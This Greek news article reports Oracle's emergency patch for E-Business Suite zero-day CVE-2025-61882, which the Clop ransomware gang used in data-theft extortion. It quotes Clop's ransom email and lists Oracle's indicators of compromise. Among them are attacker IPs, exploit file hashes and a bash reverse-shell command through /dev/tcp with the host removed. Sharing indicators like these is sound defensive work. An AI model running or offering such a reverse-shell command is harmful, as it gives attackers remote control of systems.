Η Oracle προειδοποιεί για μια κρίσιμη zero-day ευπάθεια στη σουίτα E-Business Suite, η οποία παρακολουθείται ως CVE-2025-61882 και επιτρέπει στους επιτιθέμενους να εκτελούν μη εξουσιοδοτημένη απομακρυσμένη εκτέλεση κώδικα. Η εν λόγω ευπάθεια Oracle χρησιμοποιείται ενεργά σε επιθέσεις κλοπής δεδομένων από την ομάδα ransomware Clop.

Η ευπάθεια βρίσκεται στο προϊόν Oracle Concurrent Processing της σουίτας Oracle E-Business Suite (component: BI Publisher Integration) και έχει CVSS βαθμολογία 9.8/10, λόγω της απουσίας αυθεντικοποίησης και της ευκολίας εκμετάλλευσης.
“Αυτή η ευπάθεια είναι εκμεταλλεύσιμη απομακρυσμένα χωρίς έλεγχο ταυτότητας, δηλαδή μπορεί να εκμεταλλευτεί μέσω ενός δικτύου χωρίς την ανάγκη για όνομα χρήστη και κωδικό πρόσβασης. Αν εκμεταλλευτεί επιτυχώς, αυτή η ευπάθεια μπορεί να οδηγήσει σε απομακρυσμένη εκτέλεση κώδικα“.
Η Oracle έχει επιβεβαιώσει ότι η zero-day ευπάθεια επηρεάζει τις εκδόσεις 12.2.3-12.2.14 της σουίτας Oracle E-Business Suite και έχει κυκλοφορήσει μια επείγουσα ενημέρωση για την αντιμετώπιση του σφάλματος. Η εταιρεία σημειώνει ότι οι πελάτες πρέπει πρώτα να εγκαταστήσουν το
“October 2023 Critical Patch Update” πριν μπορέσουν να εγκαταστήσουν τις νέες ενημερώσεις ασφαλείας.
Αν και η Oracle δεν έχει δηλώσει ρητά ότι πρόκειται για μια zero-day ευπάθεια, μοιράστηκε δείκτες παραβίασης που αντιστοιχούν σε μια εκμετάλλευση του Oracle EBS, που μοιράστηκαν πρόσφατα οι απειλητικοί παράγοντες στο Telegram.
Δείτε επίσης: Χάκερ εκμεταλλεύτηκαν Zimbra zero-day με κακόβουλα iCalendar files
Ο Charles Carmakal, CTO της Mandiant – Google Cloud, επιβεβαίωσε επίσης ότι αυτό ήταν το σφάλμα που εκμεταλλεύτηκε η συμμορία ransomware Clop σε επιθέσεις κλοπής δεδομένων που συνέβησαν τον Αύγουστο του 2025.
“Η Clop εκμεταλλεύτηκε πολλαπλές ευπάθειες στο Oracle EBS που τους επέτρεψαν να κλέψουν μεγάλες ποσότητες δεδομένων από αρκετά θύματα τον Αύγουστο του 2025“, μοιράστηκε ο Carmakal σε δήλωση στο BleepingComputer.

“Πολλαπλές ευπάθειες χρησιμοποιήθηκαν, συμπεριλαμβανομένων ευπαθειών που διορθώθηκαν στην ενημέρωση Ιουλίου 2025 της Oracle καθώς και μία που διορθώθηκε αυτό το Σαββατοκύριακο (CVE-2025-61882)“, συνέχισε ο Carmakal.
Η ομάδα Clop χρησιμοποίησε zero-day ευπάθεια της Oracle
Τα νέα της τελευταίας εκστρατείας εκβιασμού της Clop πρωτοδημοσιεύτηκαν την περασμένη εβδομάδα, όταν η Mandiant και η Ομάδα Πληροφοριών Απειλών της Google (GTIG) ανέφεραν ότι παρακολουθούσαν μια νέα εκστρατεία, στην οποία πολλές εταιρείες έλαβαν emails που ισχυρίζονταν ότι προέρχονταν από τους απειλητικούς παράγοντες.
Αυτά τα emails ανέφεραν ότι η Clop είχε κλέψει δεδομένα από τα συστήματα Oracle E-Business Suite της εταιρείας και απαιτούσαν λύτρα για να μην διαρρεύσουν τα κλεμμένα δεδομένα.
“Είμαστε η ομάδα CL0P. Αν δεν έχετε ακούσει για εμάς, μπορείτε να μας αναζητήσετε στο διαδίκτυο“, αναφέρει το email εκβιασμού που μοιράστηκε το BleepingComputer. “Πρόσφατα παραβιάσαμε την εφαρμογή Oracle E-Business Suite σας και αντιγράψαμε πολλά έγγραφα. Όλα τα ιδιωτικά αρχεία και άλλες πληροφορίες βρίσκονται τώρα στα συστήματά μας“.
Η συμμορία εκβιασμού Clop έχει μακρά ιστορία εκμετάλλευσης zero-day ευπαθειών σε μαζικές επιθέσεις κλοπής δεδομένων, οι οποίες περιλαμβάνουν:
– 2020: Εκμετάλλευση μιας zero-day στην πλατφόρμα Accellion FTA, επηρεάζοντας σχεδόν 100 οργανισμούς.
– 2021: Εκμετάλλευση μιας zero-day στο λογισμικό SolarWinds Serv-U FTP.
– 2023: Εκμετάλλευση μιας zero-day στην πλατφόρμα GoAnywhere MFT, παραβιάζοντας πάνω από 100 εταιρείες.
– 2023: Εκμετάλλευση μιας zero-day στο MOVEit Transfer, η πιο εκτεταμένη εκστρατεία της Clop μέχρι σήμερα, όπου μια zero-day εκμετάλλευση επέτρεψε την κλοπή δεδομένων από 2.773 οργανισμούς παγκοσμίως.
– 2024: Εκμετάλλευση δύο zero-day ευπαθειών στην πλατφόρμα μεταφοράς αρχείων Cleo (CVE-2024-50623 και CVE-2024-55956) για κλοπή δεδομένων και εκβιασμό εταιρειών.
🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN
Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.
- ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
- ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
- ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.
Δείτε επίσης: GhostSocks MaaS: Μετατροπή παραβιασμένων συσκευών σε proxies

Η Clop επιβεβαίωσε αργότερα στο BleepingComputer ότι ήταν πίσω από τα emails εκβιασμού και υπέδειξε ότι εκμεταλλεύτηκαν μια zero-day ευπάθεια της Oracle για να κλέψουν τα δεδομένα.
“Σύντομα όλα θα γίνουν φανερά. Η Oracle έχει bug στο βασικό της προϊόν και για άλλη μια φορά, η δουλειά της Clop είναι να σώσει την κατάσταση“, δήλωσε η Clop στο BleepingComputer, υποδεικνύοντας ότι έγινε εκμετάλλευση ενός νέου σφάλματος.
Ωστόσο, η Oracle αρχικά συνέδεσε την καμπάνια εκβιασμού Clop με ευπάθειες που διορθώθηκαν τον Ιούλιο του 2025 και όχι με το νέο zero-day, που γνωρίζουμε τώρα ότι χρησιμοποιήθηκε στις επιθέσεις.
Η Oracle έχει πλέον κοινοποιήσει ενδείξεις παραβίασης για την εκμετάλλευση zero-day, οι οποίες περιλαμβάνουν δύο διευθύνσεις IP που παρατηρήθηκαν να εκμεταλλεύονται διακομιστές.
- 200[.]107[.]207[.]26 – IP διεύθυνση που συνδέεται με την εκμετάλλευση. (HTTP GET και POST requests)
- 185[.]181[.]60[.]11 – IP διεύθυνση που συνδέεται με την εκμετάλλευση. (HTTP GET και POST requests)
- sh -c /bin/bash -i >& /dev/tcp// 0>&1 – Εντολή που χρησιμοποιήθηκε από το exploit για άνοιγμα ενός reverse shell.
- 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (Exploit archive)
- aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py (Μέρος του exploit)
- 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py (Μέρος του exploit)
Το exploit διέρρευσε από την ομάδα Scattered Lapsus$ Hunters
Ενώ η Clop βρίσκεται πίσω από τις επιθέσεις κλοπής δεδομένων και την εκμετάλλευση του Oracle zero-day, τα νέα για το zero-day προήλθαν πρώτα από μια διαφορετική ομάδα απειλητικών παραγόντων, που έχουν γίνει πρωτοσέλιδα τελευταία με τις εκτεταμένες επιθέσεις κλοπής δεδομένων σε πελάτες της Salesforce.
Δείτε επίσης: Κρίσιμες ευπάθειες στο Router TOTOLINK X6000R
Την Παρασκευή, αυτοί οι κακόβουλοι παράγοντες, που αυτοαποκαλούνται “Scattered Lapsus$ Hunters” (ισχυρίζονται ότι αποτελούνται από χάκερς των Scattered Spider, Lapsus$ και ShinyHunters), διέρρευσαν δύο αρχεία στο Telegram που είπαν ότι σχετίζονται με τις επιθέσεις Clop.

Ένα αρχείο με το όνομα “GIFT_FROM_CL0P.7z” περιέχει πηγαίο κώδικα Oracle που φαίνεται να σχετίζεται με το “support.oracle.com” με βάση τα ονόματα των αρχείων.
Ωστόσο, οι απειλητικοί παράγοντες κυκλοφόρησαν επίσης ένα αρχείο “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip“, το οποίο φαίνεται να ήταν το exploit της Oracle E-Business που χρησιμοποιούσε ο Clop.
Το BleepingComputer επιβεβαίωσε ότι πρόκειται για το ίδιο αρχείο που αναφέρεται στους δείκτες παραβίασης της Oracle.
Καθώς τα IOC που κοινοποιήθηκαν από την Oracle αναφέρουν το όνομα του αρχείου εκμετάλλευσης που κοινοποιήθηκε από τους Scattered Lapsus$ Hunters, επιβεβαιώνεται πλέον ότι αυτό είναι το exploit που χρησιμοποιήθηκε από την ομάδα ransomware Clop.
Πηγή: www.bleepingcomputer.com
